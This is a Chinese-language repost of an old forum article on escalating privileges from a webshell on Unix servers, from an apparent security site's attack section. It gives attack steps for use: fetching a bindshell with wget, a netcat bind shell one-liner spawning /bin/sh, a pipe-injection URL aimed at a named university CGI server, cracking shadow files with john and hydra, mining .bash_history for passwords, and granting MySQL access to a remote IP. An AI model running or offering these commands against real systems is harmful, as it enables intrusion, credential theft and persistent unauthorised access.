当前位置: 代码网 > 服务器>网络安全>脚本攻防 > unix的webshell权限提升方法

unix的webshell权限提升方法

2008年10月08日 脚本攻防 我要评论
unix的webshell权限提升方法 大部分技巧来源于我家学究天人的eong大大用wget把bindshell下载到/tmp/目录下或者再/etc/inetd.conf可写的情况下直接开一个交互的shell然后用gcc编译_num=5466654&board=... 08-10-08
大部分技巧来源于我家学究天人的eong大大
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|
ls -al显示文件

||中间的是显示的命令
很简单的办法是得到用户

1。我是说用hydra猜测密码,思路混乱的时候打成john跑shadow了。你可能有疑问,有了shell,为什么还要跑普通用户的密码(root经常是不能登陆的)。主要是为了查看.bash_history和其他资料,以及获取一个能够通过ssh/ftp/telnet 登陆的账号。也要考虑到proftpd_0day 之类的是需要一个能够正常登陆的账号的。没有这个webshell我也不会跑了,因为我连用户名(/etc/passwd)都不知道。.bash_history很可能已经包括了你所需要的user/pass.例如mysql的,还包括了管理员通常会访问的其他服务器。当然不是所有机器的访问限制都那么严格。/home对nobody来说也是经常可读的。可是我们必须考虑所有情况。
2。如果你所知道的所有的vul都被补上了,面对所有的suid你都无能为力的时候。也许通过一个可以su -的账号你可以骗出root权限。
3。对于我个人来说,用john跑shadow是为了完善我自己的密码/密码规则库。
4。我从来没有把netcat和pipe 结合一起使用过,没有经验。也请你指教一下。
to blackfox:
搜索suid是有必要的,原因嘛。。不单纯是为了exploit一个suid程序,也反映了管理员的安全意识层次嘛。当然也许这年头还会有suidshell的存在。

exec`nc -l -n -p 60000 -e /bin/sh`
nc下载地址:http://www.leftworld.net/download/show?id=316.html

mysql的ip禁止连接的打开方法:
find / -name my.cnf -print
mysql> grant all on *.* to username@ip identified by 'password';


(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com